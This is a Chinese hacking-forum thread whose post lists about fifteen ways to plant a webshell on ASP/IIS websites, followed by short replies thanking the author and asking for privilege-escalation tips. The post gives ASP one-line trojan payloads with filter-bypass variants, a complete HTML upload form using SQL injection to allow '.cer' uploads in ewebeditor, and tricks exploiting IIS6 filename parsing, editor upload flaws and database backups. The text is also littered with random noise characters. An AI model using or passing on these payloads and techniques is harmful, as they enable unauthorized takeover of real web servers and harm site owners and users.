返回列表 发帖

[原创文章] asp拿shell

1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式
& W$ V/ @. h, Y( ~* M. n9 N; e- W# |" h
2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试&#60;&#37;eval request&#40;&#34;value&#34;&#41;&#37;&#62;来突破,例如config.asp$ O9 X6 I2 a' E
/ v' c0 x5 L, ]
3.上传漏洞:
0 \! d2 J7 {# r2 Q8 N, _
* K6 C. U* f! Z# N6 Q动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x00( v5 Z. i* J( f
/ r! M4 n; m$ ?. F; c& a
逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件
0 C- b( [8 M& p  |& c) N
* p+ \2 X4 G; Q) F雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp! k  K2 [; j+ P: p
然后在上传文件里面填要传的图片格式的ASP木马  c7 Y, j4 v$ H1 X4 }, {
就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp
6 G  L! e8 |" u+ J1 D& u7 P% ?6 R4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传
$ T+ b2 _1 u$ S9 B* E0 E8 d, X' I/ z# Y8 u' p
<html>6 n0 g7 A6 e% f+ N3 O
<head>* u& o* R" E4 n# @* i
<title>ewebeditor upload.asp上传利用</title>
* D# E( f+ V# u* G" H$ S+ l& O</head>1 u" P2 G; V* K, q# \- [
<body>  t7 Y& t6 s5 x4 j7 Q3 Z7 ]) Z2 C
<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">+ P# p0 V8 F, S3 D
<input type=file name=uploadfile size=100><br><br>
! X/ ~" K( M7 C* h0 F<input type=submit value=Fuck>
9 w4 R4 v/ M: u</form>
3 G3 P1 m  B: ?! w" s, w</body>7 ]; P7 ~- P- Q4 ~6 g( f3 [
</form>, V* T/ ~4 a, E3 P' M; L. [& ]/ d+ b
</html>+ l: S* `+ j# ?  i' X6 g

) W( z" y4 ?6 D7 V) e, @, b: G) n2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问2 |+ m  q# m5 S: b2 A# D9 f
5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp3 [: Z4 m4 I; p- E- ?9 [# x! z

4 i& t8 I/ z- \/ k& q* s利用windows2003解析。建立zjq.asp的文件夹4 w' w  s$ [/ d. G

0 S* j9 G, q7 I6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型
% M6 `* v" k$ n1 i: q4 g  h  l# y& i
7.cuteeditor:类似ewebeditor
1 {5 c/ d9 f8 ^/ H; q' u. ^3 f. V4 S; G9 S5 \) A2 A5 H# D* o
8.htmleditor:同上
% y7 D. C- X7 e. l$ {- j1 s  a+ F2 I" ?" P4 g8 @8 G. r
9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破
  [3 k  G! g! ?( j3 p3 p' L, @1 z, M+ Q
<%execute request("value")%><%'<% loop <%:%>
' H, _- w* Q& f- R/ I+ T
- m7 _6 W) m) \% Y<%'<% loop <%:%><%execute request("value")%>: D3 j# i) H9 {1 M+ {

# D7 D0 j  U- D6 O+ |  T1 o<%execute request("value")'<% loop <%:%>: f& Y2 G; h3 b2 f3 \9 j
9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞) \* m' T8 [  W8 p* A, G

4 A( ?9 I# R0 n! M8 X/ E10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞* q4 L- v. m" ~

. N! O- p% U& b, n11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k3
! f- O2 k* R7 Q9 w0 j5 M7 }3 ~6 J" n6 Q$ V9 X  k
解析漏洞得到webshell; `; z" ^+ @" e8 ]/ T3 s* x

$ @9 E1 i. @+ j+ A" ]7 I12.mssql差异备份,日志备份,前提需知道web路径
" V5 Y$ O( L* V( p) |, H" p* G) V  [& _
13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell
6 y( R4 L7 w6 @0 A( g7 f8 @/ `* w* f9 D+ D: @4 |1 ]
14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell: p- L* D1 F( Y; K5 X5 H, E* v

7 Y0 W) W; w( v) O6 u" }, N+ G15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可# q% h/ N( I. F, V" R: Y

$ w6 z% {, W' M+ I- t( q0 c以上只是本人的一些拙见,并不完善,以后想到了再继续添加- S) B2 G4 o8 }) n& J3 ]6 B
不是我原创。我的朋友,飞鸟游鱼原创的
2

评分人数

  • 1335csy

  • 超超

谢谢楼主分享技术。。。

TOP

不错哦 呵呵 学习了

TOP

提权才是王道。

TOP

1# yyw258520
. l4 k" X0 I6 v$ T1 J
/ a) e, I3 z/ Q! T) a3 }. |8 J* w
很好啊、基本的入侵方法都包含了
( d2 S) `' _4 q* r3 q' O' w% |/ |3 m
最好来个提权的帖子再。7 C0 t1 q: q: P' Y. L: T; O% t
' M' d" k! `9 `* g. S
不要网上百度的。

TOP

写的很不错

TOP

kankankankan
1

TOP

好东西能分享 谢谢!!!

TOP

返回列表